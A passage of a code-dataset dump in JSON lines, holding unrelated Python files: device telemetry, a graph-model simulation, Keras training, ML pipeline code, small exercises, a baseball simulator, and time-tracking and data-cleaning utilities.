threadName)\n time_to_rearm = 300 # 5 minutes\n\n while True:\n while not subsystem.stop_flag:\n subsystem_latitude, subsystem_longitude = subsystem.gps_module.get_location()\n\n if subsystem.time_since_disarm >= time_to_rearm:\n subsystem.armed = 1\n\n subsystem.time_since_disarm += delay\n message = \"(\" + str(subsystem.armed) + \",\" + str(subsystem_latitude) + \",\" + str(subsystem_longitude) + \")\\n\"\n subsystem.telemetry_module.send_message(message)\n print(\"%TT% message sent (excluding \\\\n)\", message[:-1])\n print(\"%TT% time since disarm \", subsystem.time_since_disarm)\n\n time.sleep(delay)\n time.sleep(delay)\n\n\n#car_seat_subsystem = Subsystem(subsystem_type='car_seat', power_estimator_adc_pin_name='X1', power_estimator_adc_gpio_pin_name='X3', telemetry_module_uart_pin_number=1, gps_module_uart_number=3, vibration_motor_pin_name='X5', buzzer_pin_name='X2')\nkey_fob_subsystem = Subsystem(subsystem_type='key_fob', power_estimator_adc_pin_name='X2', power_estimator_adc_gpio_pin_name='X1', telemetry_module_uart_pin_number=3, gps_module_uart_number=1, vibration_motor_pin_name='Y8', buzzer_pin_name='X4')\n#pseudo_car_seat_system = Subsystem(subsystem_type='car_seat', power_estimator_adc_pin_name='X2', power_estimator_adc_gpio_pin_name='X1', telemetry_module_uart_pin_number=3, gps_module_uart_number=1, vibration_motor_pin_name='Y8', buzzer_pin_name='X4')\nkey_fob_subsystem.run()\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":41850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"529082411","text":"from os.path import basename\nfrom pathlib import Path\nimport numpy as np\nimport pandas as pd\nfrom joblib import Parallel, delayed, wrap_non_picklable_objects\nfrom sacred import Experiment\nfrom sacred.observers import FileStorageObserver, SlackObserver\n\nfrom src.utils import gen_B, gen_sbm, save_obj\nfrom src.models import select_sbm\n\n\nex = Experiment(\"SBM model selection\")\n\ncurrent_file = basename(__file__)[:-3]\n\npickle_path = Path(\"./maggot_models/simulations/outs/\")\nsacred_file_path = Path(f\"./maggot_models/simulations/runs/{current_file}\")\n\nslack_obs = SlackObserver.from_config(\"slack.json\")\n\nfile_obs = FileStorageObserver.create(sacred_file_path)\n\nex.observers.append(slack_obs)\nex.observers.append(file_obs)\n\n\n@ex.config\ndef config():\n \"\"\"Variables defined in config get automatically passed to main\"\"\"\n\n n_sims = 2 # noqa: F841\n n_jobs = -2 # noqa: F841\n n_blocks_range = list(range(1, 9))\n n_verts_range = [100, 200, 300, 500, 800, 1000] # noqa: F841\n n_block_try_range = list(range(1, 11)) # noqa: F841\n n_components_try_range = list(range(1, 13)) # noqa: F841\n\n # keep these the same\n a = 0.1\n b = 0.1\n\n # how strong to make the block diagonal\n assortivity = 6\n\n B_mat = gen_B(n_blocks_range[-1], a=a, b=b, assortivity=assortivity) # noqa: F841\n\n directed = False # noqa: F841\n\n\ndef run_sim(\n seed,\n n_blocks_range,\n n_verts_range,\n n_components_try_range,\n n_block_try_range,\n B_mat,\n directed,\n):\n np.random.seed(seed)\n columns = [\n \"n_params_gmm\",\n \"n_params_sbm\",\n \"rss\",\n \"mse\",\n \"score\",\n \"n_components_try\",\n \"n_block_try\",\n \"n_blocks\",\n \"n_verts\",\n ]\n master_sbm_df = pd.DataFrame(columns=columns)\n\n for i, n_blocks in enumerate(n_blocks_range):\n B_mat_trunc = B_mat[:n_blocks, :n_blocks]\n for j, n_verts in enumerate((n_verts_range)):\n graph, labels = gen_sbm(n_verts, n_blocks, B_mat_trunc)\n sbm_df = select_sbm(\n graph, n_components_try_range, n_block_try_range, directed=directed\n )\n sbm_df[\"n_verts\"] = n_verts\n sbm_df[\"n_blocks\"] = n_blocks\n master_sbm_df = master_sbm_df.append(sbm_df, ignore_index=True, sort=True)\n\n return master_sbm_df\n\n\n@ex.automain\ndef main(\n n_sims,\n n_jobs,\n n_blocks_range,\n n_verts_range,\n n_components_try_range,\n n_block_try_range,\n B_mat,\n directed,\n):\n seeds = np.random.randint(1e8, size=n_sims)\n\n # @delayed\n # @wrap_non_picklable_objects\n def run(seed):\n \"\"\" Like a lambda func \"\"\"\n return run_sim(\n seed,\n n_blocks_range,\n n_verts_range,\n n_components_try_range,\n n_block_try_range,\n B_mat,\n directed,\n )\n\n outs = Parallel(n_jobs=n_jobs, verbose=40)(delayed(run)(seed) for seed in seeds)\n\n columns = [\n \"n_params_gmm\",\n \"n_params_sbm\",\n \"rss\",\n \"mse\",\n \"score\",\n \"n_components_try\",\n \"n_block_try\",\n \"n_blocks\",\n \"n_verts\",\n \"sim_ind\",\n ]\n master_out_df = pd.DataFrame(columns=columns)\n for i, out in enumerate(outs):\n out[\"sim_ind\"] = i\n master_out_df = master_out_df.append(out, ignore_index=True, sort=True)\n # file_obs = ex.observers[1]\n save_obj(master_out_df, file_obs, \"master_out_df\")\n return 0\n","sub_path":"simulations/runs/sbm_rss_lik_sim/_sources/sbm_rss_lik_sim_e348c6baf3707e0d54d99bc2af58c421.py","file_name":"sbm_rss_lik_sim_e348c6baf3707e0d54d99bc2af58c421.py","file_ext":"py","file_size_in_byte":3456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"428543400","text":"from keras.preprocessing.image import ImageDataGenerator\nfrom keras.models import load_model\nimport rntools2 as rn\nimport time\nimport cv2 as cv\nfrom keras.callbacks import History \nimport os.path as path\nimport os\nfrom keras.callbacks import EarlyStopping, TensorBoard\nfrom sklearn.metrics import accuracy_score, f1_score\nfrom datetime import datetime\nimport keras.callbacks\n\nMEAN = 107.28881107756136\nSTD = 56.13891853797195\n#the values for the YOLO dataset are similar, being:\n#MEAN = 114.52824919676081\n#STD = 60.79076172579519\ni = 0\n\ndef normalize(x):\n global i\n i= i + 1\n \n x = (x-MEAN)/STD\n \n return x\n\ndef gen_with_norm(gen, normalize):\n for x in gen:\n yield normalize(x)\n\n\nhistory = History()\n\nnow = rn.getTime()\n\n#Paths\n\npathImg = rn.gdir + 'Databases/LP/BR_LP_SPLIT/original'\npathAnn = rn.gdir + 'Databases/LP/BR_LP_SPLIT/ann'\n\n#pathImg = rn.gdir + 'Databases/LP/DEBUG/original'\n#pathAnn = rn.gdir + 'Databases/LP/DEBUG/ann'\n\n\npathAugImg = rn.gdir + 'Databases/LP/AUG/img'\npathAugAnn = rn.gdir + 'Databases/LP/AUG/ann'\npathTestImg= rn.gdir + 'Databases/LP/TESTS/img/'\npathTestAnn= rn.gdir + 'Databases/LP/TESTS/ann/'\nGDIR = '/home/hanel/License Plate Detection/'\nLOG_DIRECTORY_ROOT = GDIR+'Logs/'\n#modelPath = GDIR+'Models/Training/'+ now +'/'\n#os.mkdir(modelPath)\n\nmodelPath = rn.gdir + 'Models/Training/' + 'test14/'\nmodelName, TRAINING_NUMBER = rn.get_latest_model(modelPath)\nmodel = load_model(modelPath + modelName)\n\n#_, _, x_test, y_test, image_size, image_total = rn.prepare_data(pathTestImg, pathTestAnn, 0)\n\nout_batch = rn.NBatchLogger(modelPath, display=100)\n\nPATIENCE = 100\nearly_stopping = EarlyStopping(monitor='loss', min_delta=0, patience=PATIENCE, verbose=0, mode='auto')\n\n# TensorBoard callback\n\nlog_dir = \"{}/run-{}/\".format(LOG_DIRECTORY_ROOT, now)\ntensorboard = TensorBoard(log_dir=log_dir, write_graph=True, write_images=True)\n#terminal: tensorboard --logdir /home/hanel/VisualStudio/planesnet/logs_tensorboard/\nmodel_checkpoint = keras.callbacks.ModelCheckpoint(modelPath+'{epoch:02d}.hdf5', monitor='val_loss', verbose=0, save_best_only=False, save_weights_only=False, mode='auto', period=1)\n\n#callbacks = [history, early_stopping, tensorboard, out_batch, model_checkpoint]\n\ncallbacks = rn.setCallbacks(modelPath, now, TRAINING_NUMBER, history)\n\n\ndata_gen_args = dict(featurewise_center=False,\n featurewise_std_normalization=False,\n rotation_range=15,\n width_shift_range=0.05,\n height_shift_range=0.05,\n shear_range = 0.1,\n horizontal_flip = False,\n vertical_flip = False,\n zca_whitening = False,\n fill_mode = 'constant',\n zoom_range=0.3)\n\n'''\ndata_gen_args = dict(samplewise_center=False,\n samplewise_std_normalization=False,\n rotation_range=0,\n width_shift_range=0,\n height_shift_range=0,\n shear_range = 0,\n horizontal_flip = False,\n vertical_flip = False,\n zca_whitening = False,\n fill_mode = 'constant',\n zoom_range=0)\n'''\n \nimage_datagen = ImageDataGenerator(**data_gen_args)\nmask_datagen = ImageDataGenerator(**data_gen_args)\nimage_datagen.mean = 107.28881107756136\nimage_datagen.std = 56.13891853797195\n# Provide the same seed and keyword arguments to the fit and flow methods\nseed = 2\n#image_datagen.fit(images, augment=True, seed=seed)\n#mask_datagen.fit(masks, augment=True, seed=seed)\n\nimage_generator = gen_with_norm(image_datagen.flow_from_directory(\n pathImg,\n class_mode=None,\n seed=seed,\n target_size= (405,360),\n color_mode=\"grayscale\",\n #save_to_dir=pathAugImg,\n #save_prefix='img',\n batch_size=10), normalize)\n\nmask_generator = mask_datagen.flow_from_directory(\n pathAnn,\n class_mode=None,\n seed=seed,\n target_size= (404,360),\n color_mode=\"grayscale\",\n #save_to_dir=pathAugAnn,\n #save_prefix='ann',\n batch_size=10)\n\n# combine generators into one which yields image and masks\ntrain_generator = zip(image_generator, mask_generator)\n\nwith open(modelPath+'/log.txt',\"a\") as log:\n log.write(rn.getTime()+ \": TRAINING NUMBER {:2d} STARTED\\n\".format(TRAINING_NUMBER))\n log.write(\" DATABASE USED: \" + pathImg + '\\n')\n log.write(\" TENSORBOARD LOG: \" + rn.gdir + 'logs_tensorboard/' + now + '\\n')\n\n'''\nmodel.fit_generator(\n train_generator,\n steps_per_epoch=2,\n epochs=800,\n callbacks = callbacks)\n'''\n\nmodel.fit_generator(\n train_generator,\n steps_per_epoch=100,\n epochs=300,\n callbacks = callbacks)\n#1133\n#test_predictions = model.predict(x_test)\n#test_predictions = np.round(test_predictions)\n#accuracy = accuracy_score(y_test, test_predictions)\n\n\nwith open(modelPath+'/log.txt',\"a\") as log:\n log.write(rn.getTime()+ \": TRAINING NUMBER {:2d} COMPLETED\\n\".format(TRAINING_NUMBER))\n log.write(\"\\n**************************************************\\n\\n\")\n #log.write(\"Final Accuracy: {:6f}\\n\".format(accuracy))\n log.write(\"Loss and Acc History: \\n\")\n for i in range(len(history.history['loss'])):\n log.write(\"Epoch {:2d}: loss = {:6f}, acc = {:6f}\\n\".format(i,history.history['loss'][i],history.history['acc'][i]))\n log.write(\"\\n**************************************************\\n\\n\")\n ","sub_path":"Main Code/data_augmentation.py","file_name":"data_augmentation.py","file_ext":"py","file_size_in_byte":5534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"319613974","text":"from imblearn.pipeline import Pipeline\nimport numpy as np\n\n\ndef f_array(in_array):\n return np.array(in_array).astype(float)\n\n\nclass ABCD_Pipeline(Pipeline):\n\n def __init__(self, steps, memory=None, verbose=False,\n mapping=False, to_map=None, names=None):\n\n self.mapping = mapping\n\n if to_map is None:\n to_map = []\n self.to_map = to_map\n\n if names is None:\n names = []\n self.names = names\n\n super().__init__(steps, memory, verbose)\n\n def get_params(self, deep=True):\n params = super()._get_params('steps', deep=deep)\n return params\n\n def set_params(self, **kwargs):\n super()._set_params('steps', **kwargs)\n return self\n\n def fit(self, X, y=None, mapping=None,\n train_data_index=None, **fit_params):\n\n # Add mapping to fit params, as either passed or new\n if mapping is not None:\n self._mapping = mapping\n elif self.mapping:\n self._mapping = {i: i for i in range(X.shape[1])}\n else:\n self._mapping = {}\n\n for name in self.to_map:\n fit_params[name + '__mapping'] = self._mapping\n\n super().fit(X, y, **fit_params)\n\n return self\n\n def _get_objs_by_name(self):\n\n fitted_objs = [[self.__getitem__(name) for name in obj]\n for obj in self.names]\n return fitted_objs\n\n def has_transforms(self):\n fitted_objs = self._get_objs_by_name()\n\n if len(fitted_objs[0]) > 0 or len(fitted_objs[3]) > 0:\n return True\n return False\n\n def proc_X_test(self, X_test, y_test, fs=True):\n\n # Order of names is:\n #\n # 0 - 'loaders'\n # 1 - 'imputers'\n # 2 - 'scalers'\n # 3 - 'transformers'\n # 4 - 'samplers'\n # 5 - 'drop_strat'\n # 6 - 'feat_selectors',\n # 7 - 'models'\n # 8 - 'ensembles'\n\n # Load all base objects and corresponding fitted objs\n fitted_objs = self._get_objs_by_name()\n\n feat_names = list(X_test)\n\n # Process the loaders, while keeping track of feature names\n for loader in fitted_objs[0]:\n\n # Use special transform in place df func\n X_test = loader.transform_df(X_test, base_name=feat_names)\n feat_names = list(X_test)\n\n # Apply pipeline operations in place\n for imputer in fitted_objs[1]:\n X_test[feat_names] = imputer.transform(f_array(X_test))\n for scaler in fitted_objs[2]:\n X_test[feat_names] = scaler.transform(f_array(X_test))\n\n # Handle transformers, w/ simmilar func to loaders\n for i in range(len(fitted_objs[3])):\n\n # Grab transformer and base name\n transformer = fitted_objs[3][i]\n base_name = self.names[3][i]\n\n # Use special transform in place df func\n X_test = transformer.transform_df(X_test, base_name=base_name)\n feat_names = list(X_test)\n\n # Skip fitted_objs[4] here, as it is samplers\n\n # Make sure to keep track of col changes w/ drop + feat_selector\n for drop in fitted_objs[5]:\n\n valid_inds = np.array(drop.transformers[0][2])\n feat_names = np.array(feat_names)[valid_inds]\n X_test = X_test[feat_names]\n\n # Drop features according to feat_selectors, keeping track of changes\n # only if passed param fs is True\n if fs:\n for feat_selector in fitted_objs[6]:\n\n feat_mask = feat_selector.get_support()\n feat_names = np.array(feat_names)[feat_mask]\n\n X_test[feat_names] = feat_selector.transform(X_test)\n X_test = X_test[feat_names]\n\n return X_test, y_test\n\n def proc_X_train(self, X_train, y_train):\n\n # Load all base objects\n fitted_objs = self._get_objs_by_name()\n\n # No need to proc in place, so the transformations are pretty easy\n for loader in fitted_objs[0]:\n X_train = loader.transform(f_array(X_train))\n for imputer in fitted_objs[1]:\n X_train = imputer.transform(f_array(X_train))\n for scaler in fitted_objs[2]:\n X_train = scaler.transform(X_train)\n for transformer in fitted_objs[3]:\n X_train = transformer.transform(X_train)\n for sampler in fitted_objs[4]:\n X_train, y_train = sampler.fit_resample(X_train, y_train)\n for drop in fitted_objs[5]:\n X_train = drop.transform(X_train)\n for feat_selector in fitted_objs[6]:\n X_train = feat_selector.transform(X_train)\n\n return X_train\n\n def inverse_transform_FIs(self, fis, feat_names):\n\n # Make compat w/ subjects x feats\n if len(fis.shape) == 1:\n fis = np.expand_dims(fis, axis=0)\n\n # To inverse transform FIs, we are only concerned with feat_selectors\n # transformers, and loaders\n fitted_objs = self._get_objs_by_name()\n\n # Feat selectors\n for feat_selector in fitted_objs[6][::-1]:\n fis = feat_selector.inverse_transform(fis)\n\n # Reverse drop strat\n for drop in fitted_objs[5]:\n fis = drop.inverse_transform(fis)\n\n # Transformers\n for transformer, name in zip(fitted_objs[3][::-1],\n self.names[3][::-1]):\n fis = transformer.inverse_transform(fis, name=name)\n\n # Loaders - special case\n inversed_loaders = {}\n for loader, name in zip(fitted_objs[0][::-1],\n self.names[0][::-1]):\n fis, inverse_X = loader.inverse_transform(fis, name=name)\n inversed_loaders.update(inverse_X)\n\n # Make the final feat_importances dict\n feat_imp_dict = {}\n for i in range(len(feat_names)):\n if i in inversed_loaders:\n feat_imp_dict[feat_names[i]] = inversed_loaders[i]\n else:\n feat_imp_dict[feat_names[i]] = fis[:, i]\n\n return feat_imp_dict\n","sub_path":"ABCD_ML/pipeline/ABCD_Pipeline.py","file_name":"ABCD_Pipeline.py","file_ext":"py","file_size_in_byte":6089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"638477162","text":"# lista = [0,1,2,3,4,5]\n# print(len(lista))\n# print(lista[6-1]) \n# mostrando ultimo elemento da lista\n\nclass Stack(object):\n def __init__(self):\n self.stack = []\n self.len_stack = 0\n \n def push(self, e):\n self.stack.append(e)\n self.len_stack += 1\n \n def pop(self):\n if not self.empty(): #se a pilha nao estiver vazia remove, pois empty retorna true se estiver vazio, logo, se estiver vazio ele nao entra ai!\n self.stack.pop(self.len_stack-1)\n self.len_stack -= 1\n else:\n print('Stack has empty!')\n \n def top(self):\n if not self.empty():\n return self.stack[-1]\n return None\n\n def empty(self):\n if self.len_stack == 0:\n return True\n return False\n\n def lenght(self):\n return self.len_stack\n\n def __str__(self):\n return '{}'.format(self.stack)\n\nstack = Stack()\nstack.pop()\nstack.push(5)\nstack.push(3)\nstack.push(6)\nprint(stack)\nprint('len is %d'%stack.lenght())\n\nprint(stack.top())\nstack.pop()\nprint(stack.top())\nstack.pop()\nprint(stack.top())\nstack.pop()\nprint(stack.top())\nprint('len is %d'%stack.lenght())\nstack.pop()\nprint('len is %d'%stack.lenght())\n","sub_path":"Algoritmos e Estruturas de Dados/Estruturas de Dados/pilha_otimizado/foo.py","file_name":"foo.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"569835494","text":"import pandas as pd\nimport random as rnd\n\n\nclass Game:\n def __init__(self):\n stats = pd.read_csv('../data/batters.csv', header=0)\n stats['1B'] = stats['H'] - (stats['2B'] + stats['3B'] + stats['HR'])\n stats['1B%'] = stats['1B'] / stats['H']\n stats['2B%'] = stats['2B'] / stats['H']\n stats['3B%'] = stats['3B'] / stats['H']\n stats['HR%'] = stats['HR'] / stats['H']\n stats['Opportunities'] = stats['AB'] + \\\n stats['HBP'] + stats['BB'] + stats['SF']\n games_filter = stats['G'] > 5\n stats = stats.loc[games_filter]\n self._data = stats[['Player', 'Team', 'Pos', '1B%',\n '2B%', '3B%', 'HR%', 'BB', 'HBP', 'SF', 'AVG', 'OBP']].copy()\n\n def list_teams(self):\n return sorted(list(self._data['Team'].unique()))\n\n def get_players(self, team):\n team_filter = self._data['Team'] == team.upper()\n return self._data.loc[team_filter]\n\n def at_bat(self, player):\n hit_or_onbase = rnd.random()\n if hit_or_onbase > (1 - player['AVG'].values[0]):\n type_of_hit = rnd.random()\n if type_of_hit > (1 - player['HR%'].values[0]):\n return 'HR'\n elif type_of_hit > (1 - player['3B%'].values[0]):\n return '3B'\n elif type_of_hit > (1 - player['2B%'].values[0]):\n return '2B'\n else:\n return '1B'\n elif hit_or_onbase > (1 - player['OBP'].values[0]):\n bb_hbp_sf = rnd.random()\n return 'WALK'\n else:\n return 'OUT'\n","sub_path":"notebooks/baseball.py","file_name":"baseball.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"201425907","text":"from datetime import datetime\n\n# Game settings\nmax_days_in_game = 5\nend_of_day = datetime(2018, 1, 1, 17, 0, 0)\nlast_patient_accepted = datetime(2018, 1, 1, 16, 18, 0)\nmax_random_integer = 30\n\n# Waiting Room Settings\nmax_waiting_rooms = 1\nmax_waiting_room_capacity = 15\nwaiting_room_random_iterator = 7\n\n# Patient Room Settings\nmax_patient_rooms = 10\n\n# Condition Settings\npossible_conditions_list = [\"Flu\",\n \"Broken Bone\",\n \"Cold\",\n \"Migraine\",\n \"Stomach Virus\",\n \"Sore Throat\",\n \"Chest Pain\",\n \"Measels\",\n \"Appendicitis\",\n \"Bronchitis\",\n \"Laryngitis\",\n \"Asthma\",\n ]\n# The defaults will allow for a max of 40 minutes spent in the patient room\nmax_condition_severity = 10\nmax_patient_time_multiplier = 4\n\npatient_names_list = [\"Margene Constante\",\n\"Isabelle Getty\",\n\"Cathi Cureton\",\n\"Cristine Sommerfield\",\n\"Oliva Matthew\",\n\"Jasmin Mei\",\n\"Dana Pehrson\",\n\"Ileana Leven\",\n\"Karon Trowell\",\n\"Monroe Farrelly\",\n\"Tasia Dirks\",\n\"Tamica Berkowitz\",\n\"Leann Harrod\",\n\"Hildegard Glade\",\n\"Sherie Caiazzo\",\n\"Aracely Metayer\",\n\"Daniella Larger\",\n\"Lanora Ledet\",\n\"Latia Melin\",\n\"Nida Kuhns\",\n\"Ralph Burley\",\n\"Katerine Cutchin\",\n\"Jeremy Palacios\",\n\"Rudolph Macedo\",\n\"Jasper Segers\",\n\"Olinda Mitchem\",\n\"Earle Muncy\",\n\"Zulema Fobbs\",\n\"Noella Duggan\",\n\"Grant Naughton\",\n\"Towanda Shattles\",\n\"Meaghan Baisden\",\n\"Alease Nogle\",\n\"Merlene Pittard\",\n\"Eugenie Markell\",\n\"Marylee Mott\",\n\"Modesto Elias\",\n\"Jonna Scaglione\",\n\"Erline Tutson\",\n\"Rhonda Ocasio\",\n\"Marget Silversmith\",\n\"Roxanna Westling\",\n\"Christopher Stroope\",\n\"Dorethea Tedford\",\n\"Lurline Granda\",\n\"Lashanda Mckeithan\",\n\"Lashandra Flett\",\n\"Leonel Madewell\",\n\"Rosemary Bancroft\",\n\"Cyrstal Rahimi\"]","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"124499941","text":"import requests\n# from requests.api import head\nurl = \"http://m.ip138.com/iplookup.asp\"\ntry:\n headers = {\"User-Agent\": \"Chrome/88.0.4324.104\"}\n kv = {'ip': '183.226.23.150'}\n r = requests.get(url, params=kv, headers = headers)\n print(r.request.url)\n r.raise_for_status()\n r.encoding = r.apparent_encoding\n print(r.text[1850:2600])\nexcept:\n print(\"爬取失败\")","sub_path":"other/爬虫/基础爬取/04.IPquery.py","file_name":"04.IPquery.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"388748157","text":"from tkinter import *\r\nfrom tkinter import ttk\r\n\r\nroot = Tk()\r\nroot.title(\"Naslov\")\r\n\r\neno_okno = ttk.Frame(root, padding = \"3 3 12 12\")\r\neno_okno.grid(column=0, row=0, sticky=(N, W, E, S))\r\neno_okno.columnconfigure(0, weight=1)\r\neno_okno.rowconfigure(0, weight=1)\r\nttk.Label(eno_okno, text = \"Herorur\").grid(row = 1, column = 1)\r\nknof = ttk.Button(eno_okno, text = \"KNOF JOU\", command = print(\"Charlie\")).grid(row = 2, column = 1)\r\n\r\nroot.mainloop()\r\n","sub_path":"tkinter_testi.py","file_name":"tkinter_testi.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"414515176","text":"NUMBERS_WANTED = 5\nnumbers = []\nusernames = ['jimbo', 'giltson98', 'derekf', 'WhatSup', 'NicolEye', 'swei45', 'BaseInterpreterInterface', 'BaseStdIn', 'Command', 'ExecState', 'InteractiveConsole', 'InterpreterInterface', 'StartServer', 'bob']\n\nusername_is_valid = False\nwhile not username_is_valid:\n input_username = input(\"Username: \")\n if input_username in usernames:\n username_is_valid = True\n break\n print(\"Invalid username!\")\n\nfor i in range(NUMBERS_WANTED):\n numbers.append(int(input(\"Number: \")))\nprint(numbers)\n\nprint(\"the first number is {}\".format(numbers[0]))\nprint(\"the last number is {}\".format(numbers[-1]))\nprint(\"the smallest number is {}\".format(min(numbers)))\nprint(\"the largest number is {}\".format(max(numbers)))\nprint(\"the average of the numbers is {:.1f}\".format(sum(numbers)/len(numbers)))\n\n","sub_path":"prac_04/list_exercises.py","file_name":"list_exercises.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"144699384","text":"# !/usr/bin/env python\n# coding=UTF-8\n\nimport os\ntry:\n from pymongo import MongoClient\nexcept:\n import pymongo\n\n\nclass ControlData(object):\n \"\"\"\n pipeline管道操作\n 数据库连接,查询,存储\n \"\"\"\n def __init__(self, mongo_host, mongo_port):\n # self.files = os.path.join(os.path.abspath('LOGDATA'), '%s')\n self._data_makedir()\n # 此处mongodb是用的台式机ip 根据实际存储位置修改\n self.client = MongoClient(host=mongo_host, port=mongo_port)\n\n @staticmethod\n def _data_makedir(): # 当前脚本所在位置若没有LOGDATA文件夹则创建,脚本执行情况记录到文件中\n if not os.path.exists('./LOGDATA'):\n os.makedirs('./LOGDATA')\n\n def data_save_txt(self, data, filename, savetype='w'):\n \"\"\"\n 储存数据到txt文本,data格式必须为list或str\n :param data: 存储内容\n :param filename: 存储文件名\n :param savetype: 存储类型,默认为 w 重写\n :return: data类型错误返回fail\n \"\"\"\n\n with open(self.files % filename, savetype, encoding='UTF-8') as f:\n if isinstance(data, list):\n for eachdata in data:\n f.write(eachdata + '\\n')\n elif isinstance(data, str):\n f.write(data + '\\n')\n else:\n return 'fail'\n\n def data_read_txt(self, filename, readtype='r'):\n \"\"\"\n 读取txt中的内容并返回\n :param filename: 读取文件名\n :param readtype: 读取方式,默认为 r\n :return: 文件内容的生成器\n \"\"\"\n\n return (eachdata for eachdata in open(self.files % filename, readtype, encoding='UTF-8'))\n\n def data_save_db(self, data, dbname, colname):\n \"\"\"\n 存储内容到mongodb\n :param data: 存储内容,必须为dict或dict组成的list\n :param dbname: 数据库名称\n :param colname: 集合名\n :return: 存储失败则返回 fail\n \"\"\"\n db = self.client[dbname]\n col = db[colname]\n if isinstance(data, list):\n col.insert_many(data)\n elif isinstance(data, dict):\n col.insert(data)\n\n return 'save succeed'\n\n def data_read_db(self, dbname, colname):\n \"\"\"\n 读取mongodb中的数据\n :param dbname: 数据库名称\n :param colname: 集合名称\n :return: mongodb的游标,可遍历\n \"\"\"\n db = self.client[dbname]\n col = db[colname]\n res = col.find({}, {'_id': 0}, no_cursor_timeout=True) # 默认返回该集合所有数据,并且游标cursor设置不超时\n\n return res\n\n","sub_path":"whiteList_v6/whole_pipeline.py","file_name":"whole_pipeline.py","file_ext":"py","file_size_in_byte":2705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"26976169","text":"from django.core.management.base import NoArgsCommand, CommandError\nfrom django.db import settings\nfrom _dotproject import DotProjectBot\nfrom h2dp.hamster.models import Fact, Tag, FactTag\nimport logging\n\n\nclass Command(NoArgsCommand):\n help = \"Syncs your hamster's logs into dotproject\"\n\n def handle_noargs(self, **options):\n\n br = DotProjectBot(settings.DP_BASE_URL)\n br.login(settings.DP_USERNAME, settings.DP_PASSWORD)\n\n categories = settings.HAMSTER_TO_DP.keys()\n tag_logged, created = Tag.objects.get_or_create(name = '_logged_in_dp_')\n if created:\n tag_logged.save()\n facts = Fact.objects \\\n .exclude(tags=tag_logged) \\\n .exclude(end_time=None) \\\n .filter(activity__category__name__in=categories)\n\n for f in facts:\n #process data\n tags = ', '.join([t.name for t in f.tags.exclude(id=tag_logged.id)])\n\n if tags and f.description:\n description = '%s %s: %s' % (f.activity.name, tags, f.description)\n elif tags:\n description = '%s %s' % (f.activity.name, tags)\n elif f.description:\n description = '%s %s' % (f.activity.name, f.description)\n else:\n description = f.activity.name\n\n dp_task_id = settings.HAMSTER_TO_DP[f.category.name]\n\n #and post the fact into dotproject!\n br.log_task(dp_task_id, f.start_time, f.duration, description)\n\n #then mark the fact as logged.\n FactTag.objects.create(fact=f, tag=tag_logged)\n","sub_path":"h2dp/hamster/management/commands/loghours.py","file_name":"loghours.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"157942474","text":"import pandas as pd\nimport numpy as np\nimport json\nimport pytz\nimport datetime\n\nimport jobs\n\ndef get_df(raw, type):\n \n print(\"Constructing dataframe...\")\n \n df = pd.DataFrame()\n \n if type == 'allocations':\n df = pd.DataFrame()\n \n for block, data in raw.items():\n df_block = pd.json_normalize(data, sep='_')\n df_block['block'] = block\n \n df = pd.concat([df, df_block], sort=False)\n \n json_struct = json.loads(df.explode('subgraphDeployment_versions').to_json(orient=\"records\")) \n df = pd.json_normalize(json_struct, sep='_') #use pd.io.json\n \n else:\n\n for block, data in raw.items():\n \n df_block = pd.json_normalize(data, sep='_')\n df_block['block'] = block\n \n df = pd.concat([df, df_block], sort=False)\n\n return df\n\ndef clean_names(df, query):\n \n print(\"Cleaning column names...\")\n\n return df.rename(columns = jobs.columns_in[query])\n\ndef clean_data(df, query):\n \n print(\"Cleaning data formats...\")\n \n if query == 'main':\n\n df['created_at'] = pd.to_datetime(df['created_at'],unit='s')\n df['created_date'] = df['created_at'].dt.date\n df['signal'] = df['signal'].astype(float)/10**18\n df['curator_rewards_total'] = df['curator_rewards_total'].astype(float)/10**18\n df['indexer_rewards_total'] = df['indexer_rewards_total'].astype(float)/10**18\n df['delegator_rewards_total'] = df['delegator_rewards_total'].astype(float)/10**18\n df['QF_total'] = df['QF_total'].astype(float)/10**18\n df['shares'] = df['shares'].astype(float)/10**18\n df['stake'] = df['stake'].astype(float)/10**18\n df['price_per_share'] = df['price_per_share'].astype(float)\n \n elif query == 'global':\n \n df['stake'] = df['stake'].astype(float)/10**18\n df['delegation'] = df['delegation'].astype(float)/10**18\n df['allocation'] = df['allocation'].astype(float)/10**18\n df['QF_total'] = df['QF_total'].astype(float)/10**18\n df['curator_rewards_total'] = df['curator_rewards_total'].astype(float)/10**18\n df['indexer_rewards_total'] = df['indexer_rewards_total'].astype(float)/10**18\n df['delegator_rewards_total'] = df['delegator_rewards_total'].astype(float)/10**18\n df['signal'] = df['signal'].astype(float)/10**18 \n \n elif query == 'allocations':\n \n df['allocated_tokens'] = df['allocated_tokens'].astype(float)/10**18\n df['closed_at_block'] = df['closed_at_block'].fillna(0).astype(int)\n df['delegation_fees'] = df['delegation_fees'].astype(float)/10**18\n df['QF_collected'] = df['QF_collected'].astype(float)/10**18\n\n return df\n\ndef add_blocktimes(df, blocktimes):\n \n print(\"Adding 